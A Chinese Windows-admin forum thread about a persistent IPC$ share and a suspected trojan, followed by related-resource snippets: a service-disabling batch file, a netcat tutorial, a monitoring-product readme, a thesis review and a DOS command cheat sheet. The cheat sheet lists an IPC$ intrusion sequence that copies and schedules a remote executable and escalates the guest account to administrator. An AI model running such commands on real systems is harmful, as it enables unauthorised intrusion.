Netbios关不了

limengchen 2003-10-20 08:41:19
在本地连接属性中将Microsoft网络的文件和打印机共享前面的勾去掉,又将
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters\autosharewks设为0,但开机后用net share查看还是有一个IPC$。
...全文
52 8 打赏 收藏 转发到动态 举报
写回复
用AI写文章
8 条回复
切换为时间正序
请发表友善的回复…
发表回复
limengchen 2003-11-09
  • 打赏
  • 举报
回复
In the past, when I type "net share" in the console window, it said the service is not running, and asked me whether to start it.
However, when I type the same command now, the IPC$ share will be listed below. Why is that?
icuc88 2003-11-08
  • 打赏
  • 举报
回复
用msconfig看了一下,没发现什么可疑的启动项,但服务里面多了一个ASP.NET State Service,在.net framework的文件夹中,不知道是不是木马。
^^^^^^^^^^^^^^^^^
不是!


如果去掉共享,请看FAQ:
http://expert.csdn.net/Expert/FAQ/FAQ_Index.asp?id=174909
luckufo 2003-10-24
  • 打赏
  • 举报
回复
发生系统错误5?
请问这是一个什么问题?
No001 2003-10-20
  • 打赏
  • 举报
回复
ding
falcon6666 2003-10-20
  • 打赏
  • 举报
回复
up
limengchen 2003-10-20
  • 打赏
  • 举报
回复
瑞星的实时监控也没用了(杀毒有用),故意进入一个含有病毒的文件夹也没反应。
用msconfig看了一下,没发现什么可疑的启动项,但服务里面多了一个ASP.NET State Service,在.net framework的文件夹中,不知道是不是木马。
limengchen 2003-10-20
  • 打赏
  • 举报
回复
用net share ipc$ /del会出现拒绝访问,估计中木马了。
ravenkatte 2003-10-20
  • 打赏
  • 举报
回复
建立一个批处理,放到启动栏,内容如下:

net share ipc$ /delete
@echo off ::automatic updates -windows自动更新,靠,滚! sc stop wuauserv sc config wuauserv start= disabled ::clipbook - 用与局域网电脑来共享 粘贴/剪贴的内容。(靠,想得出!) sc stop clipsrv sc config clipsrv start= disabled ::com+Event system -一些 COM+ 软件需要,检查你的 c:\program files\ComPlus Applications 目录,没东西可以把这个服务关闭. sc stop eventsystem sc config eventsystem start= disabled ::COM+Event system application -同上 sc stop comsysapp sc config comsysapp start= disabled ::COmputer browser - 用来浏览局域网电脑的服务,但关了也不影响浏览!垃圾 sc stop Browser sc config Browser start= disabled ::DHCP client-静态IP者需要(xDSL 等)小猫就不用了!! sc stop dhcp sc config dhcp start= disabled ::Distributed link tracking client-用于局域网更新连接信息,比如在电脑A有个文件,在B做了个连接,如果文件移动了,这个服务将会更新信息。占用4兆内存。 sc stop trkwks sc config trkwks start= disabled ::Distributed Transaction coordinator-无聊的东西。 sc stop msdtc sc config msdtc start= disabled ::DNS Client-DNS解析服务。。无聊~~ sc stop dnscache sc config dnscache start= disabled ::Fast user switching compatibility-多用户快速切换服务..无聊 sc stop fastuserswitchingcompatibility sc config fastuserswitchingcompatibility start= disabled ::IMAPI CD-burning COM service -xp刻牒服务,用软件就不用了占用1。6兆内存 sc stop imapiservice sc config imapiservice start= disabled ::IPSEC Services-大众用户连边都沾不上。 sc stop policyagent sc config policyagent start= disabled ::Logical Disk manager -磁盘管理服务。。需要时它会通知你,所以一般关。 sc stop dmserver sc config dmserver start= disabled ::Logical Disk manager administrative service-同上。 sc stop dmadmin sc config dmadmin start= disabled ::messenger -不是msn,不想被骚扰的话就关。注:妖刺就是利用这个。 sc stop messenger sc config messenger start= disabled ::Net Logon-登陆domai controller 用的,大众用户快关! sc stop netlogon sc config netlogon start= disabled ::Netmeeting remote desktop sharing-用netmeeting实现电脑共享。。晕!关! sc stop mnmsrvc sc config mnmsrvc start= disabled ::Network DDE -和clipbook一起用的,无聊~~~~ sc stop netdde sc config netdde start= disabled ::Network DDE DSDM -同上 sc stop netddedsdm sc config netddedsdm start= disabled ::Network Location Awareness-如有网络共享或ICS/ICF可能需要.(服务器端) sc stop nla sc config nla start= disabled ::NT LM Security support provider-telnet 服务用的东东,关!! sc stop ntlmssp sc config ntlmssp start= disabled ::NVIDIA Driver Helper service -nvidia 显卡帮助,关! sc stop dnscache sc config dnscache start= disabled ::Portable media serial number-绝对无用,无聊之及。 sc stop wmdmpmsn sc config wmdmpmsn start= disabled ::QoS RSVP -关!就是那个20%的 QoS sc stop rsvp sc config rsvp start= disabled ::Remote desktop help session manager-远程帮助服务,傻透,占用4兆内存。 sc stop rdsessmgr sc config rdsessmgr start= disabled ::remote registry -远程注册表运行/修改。大漏洞,还不快关!! sc stop remoteregistry sc config remoteregistry start= disabled ::routing and remote access-哈哈。。不知者关! sc stop remoteaccess sc config remoteaccess start= disabled ::secondary logon-给与administrator 以外的用户分配指定操作权.晕~~~ sc stop seclogon sc config seclogon start= disabled ::server -局域网文件/打印共享需要的。 sc stop lanmanserver sc config lanmanserver start= disabled ::smart card -关!1。4兆内存 sc stop scardsvr sc config scardsvr start= disabled ::SSDP Discovery service-没有什么硬件利用这个服务。。 sc stop ssdpsrv sc config ssdpsrv start= disabled ::system restore service -系统还原服务,吃资源和内存的怪兽。。虽然有时用到,自己决定。 sc stop srservice sc config srservice start= disabled ::TCP/IP NetBIOS helper-如果你的网络不用 Netbios 或WINS,关了. sc stop lmhosts sc config lmhosts start= disabled ::telnet -大漏洞,我第一个关的就是这个.这根dos中 telnet 命令没关系。2兆内存。 sc stop tlntsvr sc config tlntsvr start= disabled ::universal plug and play device host-同SSDP Discovery Service ,没用. sc stop upnphost sc config upnphost start= disabled ::volume shadow copy-同MS Software Shadow Copy Provider,无用. sc stop vss sc config vss start= disabled ::Windows Installer -windows的MSI安装服务,建议设成手动。 sc stop msiserver sc config msiserver start= demand
本软件包含windows和linux两种版本 1、 了解NC的用法 命令:   nc –h 技巧:   win98用户可以在autoexec.bat加入path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat) 1、基本使用   想要连接到某处: nc [-options] hostname port[s] [ports] ...   绑定端口等待连接: nc -l -p port [-options] [hostname] [port]   参数:   -e prog 程序重定向,一旦连接,就执行 [危险!!]   -g gateway source-routing hop point[s], up to 8   -G num source-routing pointer: 4, 8, 12, ...   -h 帮助信息   -i secs 延时的间隔   -l 监听模式,用于入站连接   -n 指定数字的IP地址,不能用hostname   -o file 记录16进制的传输   -p port 本地端口号   -r 任意指定本地及远程端口   -s addr 本地源地址   -u UDP模式   -v 详细输出——用两个-v可得到更详细的内容   -w secs timeout的时间   -z 将输入输出关掉——用于扫描时   其中端口号可以指定一个或者用lo-hi式的指定范围。   例如:扫描端口   tcp扫描   C:\nc>nc -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?)   net [192.168.0.80] 139 (netbios-ssn) open   net [192.168.0.80] 138 (?)   net [192.168.0.80] 137 (netbios-ns)   net [192.168.0.80] 136 (?)   net [192.168.0.80] 135 (epmap) open   net [192.168.0.80] 81 (?) open   net [192.168.0.80] 80 (http) open   net [192.168.0.80] 79 (finger)   net [192.168.0.80] 25 (smtp) open   net [192.168.0.80] 24 (?)   net [192.168.0.80] 23 (telnet)   net [192.168.0.80] 21 (ftp)   udp扫描   C:\nc>nc -u -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?) open   net [192.168.0.80] 139 (?) open   net [192.168.0.80] 138 (netbios-dgm) open   net [192.168.0.80] 137 (netbios-ns) open   net [192.168.0.80] 54 (?) open   net [192.168.0.80] 53 (domain) open   net [192.168.0.80] 38 (?) open   net [192.168.0.80] 37 (time) open   net [192.168.0.80] 7 (echo) open 2、高级应用   1.Window用法:   (1)IE的MIME欺骗   www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)   打开这个页面,有http://www.try2hack/cgi-bin/level7页面(这个网站提供了黑客的8关,过了这8关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft/ms重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux有IE6.72? 微软会在它的页面上放的链接?看看页面的源代码,是在服务器端 执行的perl脚本,根本无法看到,还是研究一下IE5和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈,这个cgi应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可
非常感谢使用聚生网管系统! 一、聚生网管系统安装步骤: 1、安装Winpcap抓包驱动(点击下一步即可,如果你安装过winpcap的其他版本则直接覆盖安装); 2、安装聚生网管系统主程序LanQos.exe(点击下一步即可); 3、安装聚生网管系统主加密狗驱动(也是点击下一步,试用版不需要); 4、如果还有其他问题,请点击“请求大势至远程协助.exe”,然后通过电话、QQ或其他方式告诉我们ID和密码,我们就可以直接远程您的桌面为您演示、设置或解决聚生网管的各种使用问题。 二、聚生网管使用步骤: 1、开始-程序-聚生网管,启动之后需要先创建监控网段,按照界面提示下一步即可,在选择监控网卡时需要从框内下拉选择你当前上网的网卡,随后一直点击下一步完成即可创建完成一个监控网段。 2、选中创建的监控网段,选择右侧的“开始监控”,即进入了聚生网管的主界面,然后点击“启动管理”,并在要控制的电脑前面的框内打勾(你可以点击全选即可给全部电脑电脑打勾,试用版只能打勾20台电脑),即可看到主机的上下行带宽(即流量); 3、如果想进行实际的控制上网行为就必须为他们指派策略。在“配置策略”里面创建或在主机列表右键点击“新建策略”均可,当然你也可以用我们软件预设的策略。创建完策略或编辑完策略(直接双击某个策略即可编辑)点击确定即可保存,然后需要将策略指派给要控制的电脑;你可以在“配置策略”中右侧点击“指派策略”,或在主机列表中选择“为选中主机重新指派策略”或“批量指派策略”即可将策略指派给单个或批量的电脑,指派完成即可生效。 4、如果你想取消对某个电脑的控制,只需要将其前面的勾取消掉即可完全取消控制,而无需变更策略;如果你想变更对某个主机策略,你需要在对应的主机这里右键点击选择“为选中主机重新指派策略”,然后选择你想指派的策略并点击确定即可。 5、关闭软件后所有的网络控制功能自动失效。 6、更详细的使用说明请阅读“聚生网管使用手册”和“聚生网管常见问题”。 三、使用聚生网管的注意事项。 注:试用版聚生网管系统里面某些功能按钮为灰色,代表正式版才提供,试用版暂不提供试用。 为了让客户能更好地使用聚生网管系统,充分发掘软件的巨大潜能。我们特地总结了客户在使用聚生网管的系统中可能遇到的问题和解决方法,提供给客户参考: 1、在运行聚生网管之前,确保你的路由器、交换机、防火墙等网络设备没有进行IP-MAC绑定功能;确保在路由器或者防火墙上没有启用ARP防病毒功能,否则可能对软件有一些干扰。 2、不要轻易启用控制策略里面的“网络限制”里面的“启用高级网络控制”以及“启用主机强制隔离功能”,这个功能是针对已经明确了危险主机的情况下的特定隔离功能,而不是实时自动防护的功能 3、在带宽限制里面,尽量不要选择“启用发现P2P下载时自动限制该主机其带宽的功能”,因为现在越来越多的合法软件采用P2P技术,勾选此功能可能误拦截其带宽,从而影响其上网。 4、除非完全禁止一切下载,否则不要在普通下载限制里面选择“严格禁止HTTP”下载,否则可能误拦截一些网站,因为网站访问的原理也是将网站先下载到本地。 5、如果安装聚生网管的电脑更改IP后,或者更换MAC以后,请务必删除已有的网段,重新创建新的网段,然后再启用监控功能;另外,控制机本身最好指定一个静态IP,而不是自动获取IP, 6、尽量不要在安装聚生网管的控制机上同时安装其他的网管软件,有可能有冲突;也尽量不要安装聚生网管的其他版本;同时,如果你安装了类似的网管软件,则最好完全卸载,同时还可能需要完全卸载winpcap抓包软件,而重新安装聚生网管自带的winpcap抓包软件(可以进“控制面板”的“添加删除程序”里面卸载winpcap,也可以直接覆盖安装),如果安装winpcap失败则你需要在操作系统的c:\windows\system32下面搜索“wpcap.dll”和“packet.dll”这两个文件,然后将它们删除;如果删除失败说明你安装的网管软件还在使用,你可以重启电脑按F8进入安全模式下进行删除。 7、尽量不要和卡巴斯基杀毒软件一起安装,对软件有误报和干扰;也尽量不要在安装聚生网管的控制机上安装一些防火墙、如瑞星防火墙、360防火墙、ARP防火墙、金山网镖等等,防火墙的安装本身会影响网速,降低监控效率,同时也可能对聚生网管产生误报和干扰。 8、尽量不要在同一磁盘、同一安装目录下重复安装聚生网管,可以尝试更换新的安装磁盘和安装目录 9、尽量在每天将安装聚生网管的电脑重新启动一下,以释放内存,便于软件更高效地工作;如果安装在服务器上则不必每天重启。 10、如果不是必须查询日志,就可以不必启用日志记录功能,这样可以提高软件的监控效,降低对软件自身和电脑负荷。标准版和试用版客户不要选择,因为没有提供日志查询功能。 11、有时候使用聚生网管和网络打印机有冲突,这时候只要把网络打印机的IP地址改为自动分配,重启就可以了。 12、一般的监控方式都是选择“主动引导模式”,请不要私自选择其他的监控方式,否则可能无法监控。 13、极少数情况下,聚生网管会报内存出错(windows平台下程序常见错误),这个可能与你的电脑安装了framwork1.1或者其他版本有关系,应将其卸载,推荐使用framwork2.0版本。 14、查询日志需要安装framwork2.0,同时,你必须在“软件配置”里面取消勾选“启用精简高效模式进行监控”,另外,在网络限制里面你需要选择“记录WWW历史网址记录功能”。 15、有时候各项操作都正确,但是聚生网管控制功能却没有生效,这是因为控制机可能没有安装Netbios协议。安装方法:右键点击网上邻居-属性-右键点击本地链接-属性-安装-协议-Netbios协议就可以了。 16、如果你在无线路由、通过电脑的无线网卡或通过台式机的USB无线网卡上网的坏境下使用聚生网管时,在极少数情况下可能会出现以下提示:failed to set hardware filter to pro miscuous mode的错误,这是因为你的无线网卡不支持混杂模式(出现这种情况一般是无线网卡不是英特尔芯片的,英特尔芯片的无线网卡都没有问题。同时,购买正式版聚生网管我们会赠送可以用的USB无线网卡)。这种情况下,你可能需要切换到有线环境进行测试。 更多问题联系我们 大势至(北京)软件工程有限公司 地址:北京海淀区中关村北大街116号北京大学科技园2号楼 邮编:100080 官方主站:http://www.grabsun.com 备用网址1:http://www.grabsun.com.cn 备用网址2:http://www.grabsun.cn 备用网址3:http://www.jushengwangguan.com 售前咨询热线: 010-6265 6060 4007-06-05-04(免长途话费,一至周五,早9点至晚六点) 为保证邮件安全,请同时发送至两个邮箱进行业务联系。 销售1:肖女士:010-62656060-601;010-8663-0101 邮件:netsense@vip.sohu.com,xiaoyao@grabsun.com 销售2:赵女士:010-62656060-602;010-8663-0058 邮件:sales@grabsun.com,zhangting@grabsun.com 销售3:王女士:010-62656060-603;010-8541-1818 邮件: netsense@vip.sina.com,wangjing@grabsun.com 技术支持1:郑先生:010-82825062 技术支持2:陈先生:010-62656060-605 技术支持邮箱:grabsun@vip.163.com 客户服务: service@grabsun.com 传真1:010-82825052 传真2:010-82825512 客服 MSN:sale@grabsun.com
文献综述 计算机科学与技术 基于 java 的远程监控系统的设计与实现 一、前言 近年来,随着计算机及网络的应用普及,千千万万的人们在娱乐、通讯、学习、工作等 各方面都实现了前所未有的信息化,极大地提高了生活质量与工作效率。然而在这种种便利 背后,你关注的人在做什么呢?比如:公司员工。因此,远程监控发挥作用了。这里以公司 领导为例,远程监控系统软件方便了公司领导人管理公司员工。在一个企业中,作为公司领 导人,一定很担心自己的员工利用上班时间做工作以外的其他事情,也很担心他们泄露公司 机密,等等。有了远程监控,这样的担心就很容易解决,你不用亲临监督每个员工,在自己 电脑面前就能对他们的一举一动了如指掌[1]。 网络技术的不断发展,也为远程监控技术的发展创造了条件。远程监控软件一般分两个 部分:一部分是客户端程序 Client,另一部分是服务器端程序 Server,多数远程监控软件把 被监控端作为服务器,主控端作为客户端[2]。考虑到在监控过程中,如果把主控端作为客户 端向被监控端发送 TCP 连接请求,容易被防火墙或者杀毒软件阻止,监控过程就不能够成功 进行。因此,本毕业设计将被监控端设计为客户端,向主控端发连接请求,建立连接后,主 控端向被监控端发送远程控制命令,控制被监控端电脑中的各种应用程序运行,被监控端对 主控端发送来的命令进行处理,并将命令处理结果返回给主控端[3]。 远程监控软件顺应时代发展的需求,它实用、使用简便,是非常不错的软件。 二、远程监控系统的现状 远程监控是在网络上由一台电脑(主控端 Remote)远距离去监控另一台电脑(被监控端 Host)的技术,这里的远程不是字面意思的远距离,一般指通过网络监控远端电脑,不过, 大多数时候我们所说的远程监控往往指在局域网中的远程监控而言[4]。 当操作者使用主控端电脑监控被监控端电脑时,就如同坐在被监控端电脑的屏幕前一 样,可以启动被监控端电脑的应用程序,可以使用被监控端电脑的文件资料,不过,有一个 概念需要明确,那就是主控端电脑只是将键盘和鼠标的指令传送给远程电脑,同时将被监控 端电脑的屏幕画面通过通信线路回传过来[5]。也就是说,我们控制被监控端电脑进行操作似 乎是在眼前的电脑上进行的,实质是在远程的电脑中实现的,不论打开文件,还是上网浏 览、下载等都是存储在远程的被监控端电脑中的。 电脑中的远程控制技术,始于 DOS 时代,只不过当时由于技术上没有什么大的变化,网 络不发达,市场没有更高的要求,所以远程控制技术没有引起更多人的注意[6]。但是,随着 网络的高度发展,电脑的管理及技术支持的需要,远程操作及控制技术越来越引起人们的关 注。 远程控制一般支持下面的这些网络方式:LAN、WAN、拨号方式、互联网方式。此外,有 的远程控制软件还支持通过串口、并口、红外端口来对远程机进行控制(不过,这里说的远 程电脑,只能是有限距离范围内的电脑了)[7]。传统的远程控制软件一般使用 NETBEUI、 NETBIOS、IPX/SPX、TCP/IP 等协议来实现远程控制,不过,随着网络技术的发展,目前很多 远程控制软件提供通过 Web 页面以 Java 技术来控制远程电脑,这样可以实现不同操作系统 下的远程控制,例如数技通科技有限公司在就推出了全球第一套基于中文 JAVA 的跨平台远 程控制软件――易控[8]。 三 、远程监控系统的原理和特点 随着计算机网络的迅猛发展,全球信息化已经成为人类未来发展的大趋势,远程监控也必 将对人们提高工作效率、实现信息和资源共享、打破空间限制和实现技术革新等各个方面起 到积极的作用,而且,也将对信息安全等网络安全领域,防止网络犯罪等领域的技术发展提 供有益的技术支持[9]。所以,对于远程监控技术的研究分析具有深远的意义。 远程监控软件一般分两个部分:一部分是客户端程序 Client,另一部分是服务器端程序 Server,由于本毕业设计的通信模块有别于传统的远程监控软件,在使用前需要将客户端程 序安装到被监控端电脑上,将服务器端程序安装到主控端电脑上[10]。 它的控制的过程是先在被监控端电脑上执行客户端程序,像一个普通的客户一样向主控 端电脑中的服务器端程序发出信号,建立一个特殊的远程服务,然后通过这个远程服务,接 收主控端发送过来的远程控制命令,并对命令进行处理,最后将命令处理结果返回给主控 端,我们称这种远程控制方式为基于远程服务的远程控制,通过远程监控软件,我们可以进 行很多方面的远程控制,包括获取目标电脑屏幕图像、窗口及进程列表;记录并提取远端键 盘事件(击键序列,即监视远端键盘输入的内容);可以打开、关闭目标电脑的任意目录并实 现资源共享;提取拨号网络及普通程序的密码;激活、中止远端程序进程;管理远端电脑的 文件和文件夹;关闭或者重新
================================================================== 一些常用的DOS网络命令 ================================================================== net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享目录) net share c$ /del 禁止C$共享 net use z: \\*.*.*.*\C$ 把 *.*.*.*(IP) 的共享 C$ 映射为本地的 Z:盘 net use c: /del 删除映射的c盘 net use * /del /y 删除全部 net start 显示本地主机当前服务 net start telnet 启动 Telnet 服务 net start Server 启动 Server 服务 (IPC$ 和共享要靠这个服务) net stop Messenger 停止信使服务(不会在有烦人的Win的弹出广告了)! net stop server 停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵) net user 得到本地主机的用户列表 net user guest /active:yes 将停用的guest帐号激活(变为可用) net user guest 888888 把 Guest 帐号的密码改为 888888 net localgroup Administrators guest /add 把 Guest 加到Administrators组中(这样你就有了超级权限了) net view \\*.*.*.* 查看指定IP主机上的共享 nbtstat -A *.*.*.* 得到远程主机的NetBIOS用户名列表 net share 查看本地主机的共享资源(本地的默认共享也可以看到) net use \\*.*.*.*\ipc$ "" /user:"" 建立空连接 telnet *.*.*.* 90 连接对方机子的telnet,端口为90 ipconfig 查看本机的IP信息 入侵ipc过程序命令 ----------------------------------------------- net use \\*.*.*.*\ipc$ "" /user:"Administrator" 建立用户名为 Administrator 密码为空的连接 copy server1.exe \\*.*.*.*\Admin$\system32 即将当前目录下的Server1.exe复制到对方Admin$共享的System32目录内 net time \\*.*.*.* 查看远程主机的当前时间 at \\*.*.*.* 14:00 server1.exe 在对方机子添加一个在 14:00 运行 server1.exe 的任务 netstat [-r] [-s] [-n] [-a] 参数含义: -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括TCP协议、UDP协议、IP协议); -n 以数字表格形式显示地址和端口; -a 显示所有主机的端口号。 ------------------------------------------------------------------ 2010/8/20

6,849

社区成员

发帖
与我相关
我的任务
社区描述
Windows 2016/2012/2008/2003/2000/NT
社区管理员
  • Windows Server社区
  • qishine
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧